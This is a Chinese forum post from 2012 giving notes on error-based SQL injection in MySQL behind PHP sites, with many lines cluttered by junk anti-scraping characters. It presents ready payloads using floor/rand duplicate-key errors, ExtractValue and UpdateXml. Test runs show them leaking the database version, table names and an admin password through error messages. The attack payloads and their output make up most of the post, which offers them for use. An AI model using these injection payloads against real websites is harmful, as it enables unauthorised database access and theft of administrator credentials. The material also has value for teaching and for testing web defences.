放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。& A1 u& {& h# |2 Y* Y
实际测试环境:) T! P6 i7 ^# C) A
( _& T4 E5 N3 t% T2 T! X
# |0 j# F4 u2 e& o8 b, d: Jmysql> show tables;4 [# V2 u, |8 @
+----------------+
/ V7 k- _% |* [% V| Tables_in_test |1 }' M, F8 N" _; G
+----------------+4 @2 n8 T* S8 I9 l/ \
| admin | P5 n: x' v, N! x% z) {8 e f
| article |, q0 u+ E0 }. a: A: I
+----------------+
0 w' {+ Y9 t0 \& S3 }9 i% ~
% Z) d# I% h$ \0 E2 s2 \
8 U6 e7 [- r0 q3 @ 6 U3 ~4 O" Y4 j3 W& d, j8 P
mysql> describe admin;
/ {3 f/ S% M. k& g* r+-------+------------------+------+-----+---------+----------------+7 O& p; S3 e) k( L3 @
| Field | Type | Null | Key | Default | Extra |
2 E/ \5 \* |0 s. j+-------+------------------+------+-----+---------+----------------+) z. \- }& I+ f* i( W' c3 z
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
: b9 H2 y' _1 L) C3 m8 r| user | varchar(50) | NO | | NULL | |
! ]6 t' g |6 {# g& F| pass | varchar(50) | NO | | NULL | |
/ z! {: E+ p( [$ D4 m1 j9 O- ~+-------+------------------+------+-----+---------+----------------+
6 Y3 ?) c( ]8 m; w3 N + r" ^* T8 L; [/ Z2 v# V1 q: X' p e
- f( ]- T2 v- [
8 N m- l8 R% \! o; v3 e$ h, F/ O& qmysql> describe article;5 [1 @& R' h0 p" y7 i
+---------+------------------+------+-----+---------+----------------+
- K8 K8 ^) E8 i| Field | Type | Null | Key | Default | Extra |; {6 [$ ?2 X* Q0 x& g$ M6 l
+---------+------------------+------+-----+---------+----------------+, O6 h$ f% N4 }/ m. i' V7 `
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |, o% e- X) a* Y9 m& T
| title | varchar(50) | NO | | NULL | |
! I# n! Q; Y( Z| content | varchar(50) | NO | | NULL | |
) z$ U0 F# Y. G; _( ?5 ?+---------+------------------+------+-----+---------+----------------+* U2 S! S) _# W8 O! [ v/ m/ f
1、通过floor报错
7 m: s4 |+ y: k( V0 R. t* {可以通过如下一些利用代码
2 n s$ @2 e5 _7 D $ E+ p1 r/ K; }: p+ v9 {* H$ Z
& C# F9 z, a9 r# r
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
/ |- I) o4 d) {" O# ofrom information_schema.tables group by x)a);1 H h, Y. q& i$ A1 t
6 p) X1 m4 R7 x# t' c6 T0 Q1 X+ |
$ ~, T- K7 P# `, Y/ Z: T3 q E3 Yand (select count(*) from (select 1 union select null union select !1)x
1 d' Q g/ w* `) |. `( U# v; t. Igroup by concat((select table_name from information_schema.tables limit 1),
7 B# G% ]" ?+ W. U; Z9 r8 ]3 x# @( Ffloor(rand(0)*2)));
0 D6 p7 C9 @' Q7 b- ^8 Q& \举例如下:
; K8 ~4 w' a* A0 [6 [. b首先进行正常查询:! O! h' p% G+ G0 T; a
( n! v6 j& C9 X5 P/ L% @- Umysql> select * from article where id = 1;
; K2 r9 d, q2 T2 ^4 M+----+-------+---------+
% d9 R" {4 p9 r; \; i* R6 o% T5 l+ B2 h| id | title | content |
* d5 l0 K8 L" ?7 t& F: A+----+-------+---------+
( U9 y+ C: c* }$ B% j3 H7 I+ r| 1 | test | do it |4 i0 j' a1 c1 ^
+----+-------+---------+
% j8 m- J9 l$ b; _1 c( b假如id输入存在注入的话,可以通过如下语句进行报错。/ a; }/ s" O1 u' i3 J( v; @! |4 }
: S- i- A2 ?( g) ~/ T
6 U" T; R: S" E8 r& Bmysql> select * from article where id = 1 and (select 1 from% h3 P# ~0 i) X
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
6 s" W$ h& ^1 BERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'' n3 b+ h! s6 Z% h$ V+ e
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
7 a$ `& X% ]! s+ f2 @例如我们需要查询管理员用户名和密码:
8 B2 V- o/ M, u3 U6 K$ iMethod1:+ J3 u" e& b, N) j/ g% I
2 V/ z9 d7 h+ V8 v# f! t, W
+ K. S( a4 A0 w7 W: _! `/ U( bmysql> select * from article where id = 1 and (select 1 from& i5 o/ ]4 F9 y L. V+ r! Q
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
. v8 W& I* x- \/ qfrom information_schema.tables group by x)a);
5 S5 I( K( x, p S# n0 zERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
0 n9 p1 p* h: j SMethod2:- N- y8 z! k; M, B
3 t6 i a$ i" b7 p$ \' p
3 z; ]: P" y! ~5 a" l
mysql> select * from article where id = 1 and (select count(*)# |2 W" F K9 ?4 L7 t
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
# e# N. U4 `0 P8 { L7 N, a# wfloor(rand(0)*2)));
+ E$ K- w; s2 [0 }" ?+ w5 [6 e! HERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
6 O& m6 X9 f, X: p! i# n2、ExtractValue6 ^. s3 k6 ^ U P4 y
测试语句如下. |% C0 Q9 c4 k7 ], q* }8 g
3 K# H. Q2 R( ^6 L% k9 Y
" k, G. ~9 Y; B, v. Mand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
2 x# V* f: z. R" F! S/ G k实际测试过程
8 T/ I" e. n& _9 k: `0 i# F
4 a5 \ a( V0 ~( Y$ ~+ u3 w$ n
2 K1 D+ H! w' }" D9 Tmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
0 O1 M! |& O$ t) z$ ~& K) ?) B1 g* ^(select pass from admin limit 1)));--
9 o& t: q6 n# g/ {ERROR 1105 (HY000): XPATH syntax error: '\admin888'
; D: q* q9 ]; }. }3、UpdateXml
* |( }$ W' C$ ]; g+ E4 x测试语句
+ F' D, ^, s" o ' Y8 h7 m) y8 \
! O1 S8 [* d, C: f5 |' j
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))7 L) B( g7 \5 ^9 N
实际测试过程1 l, ^2 {& G, g l/ n" l
2 C- Y8 _; X' W( q8 e. h
2 @9 z& ^1 u& D. g. C) v
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,* s" v2 O3 k/ }! z8 T
(select pass from admin limit 1),0x5e24),1));
7 {7 c. t k; W/ t7 J( S2 r/ lERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'7 b* V+ ?' |3 l2 f7 _. h
All, thanks foreign guys.) ^0 U) |# o2 z! N: p: i
1 t4 f2 z% u5 z% j3 ?( r3 ^# z& o8 e
|
发表于 2012-12-10 10:28:51
收藏
支持
反对